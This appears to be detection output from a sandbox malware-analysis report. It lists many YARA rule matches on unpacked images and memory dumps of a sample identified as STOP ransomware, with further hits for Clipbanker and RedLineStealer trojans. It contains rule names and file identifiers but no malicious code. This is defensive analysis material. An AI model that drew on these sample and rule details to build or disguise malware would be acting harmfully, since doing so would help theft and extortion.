Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
